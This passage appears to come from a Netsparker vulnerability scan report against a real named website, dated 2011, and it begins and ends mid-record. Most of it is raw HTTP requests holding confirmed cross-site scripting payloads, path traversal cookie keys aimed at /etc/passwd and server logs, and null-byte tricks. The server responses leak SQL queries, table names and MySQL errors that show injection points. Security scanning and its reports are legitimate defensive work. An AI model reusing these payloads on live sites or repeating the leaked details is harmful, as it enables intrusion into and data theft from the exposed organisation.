OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=oc16gpffn3dogu2vles4v088r0; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005EE)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E7)%3C/script%3E

/ppc/leadflow/parl00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E7)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005E7)</script>

Request

GET /ppc/leadflow/parl00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005E7)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qkcmdn300uddhopd17jsum4ln2; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php'"--></style></script><script>netsparker(0x0005E7)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E7)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/dima00/

/ppc/leadflow/dima00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/dima00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005F1)</script>

Request

GET /ppc/leadflow/dima00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005F1)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hevstj5bc4e6f87btdbp1b2jc1; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>' OR prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>' OR prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>' OR prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>' OR prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>' OR prj.project_page_url = 'leadflow/dima00/?nsextt='"--></style></script><script>netsparker(0x0005F1)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F1)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/project.php

/ppc/leadflow/lodi00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/project.php?'"--></style></script><script>alert(0x0005F0..

Parameters

Parameter Type Value
catId GET 110003
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005F0)</script>

Request

GET /ppc/leadflow/lodi00/project.php?'"--></style></script><script>netsparker(0x0005F0)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 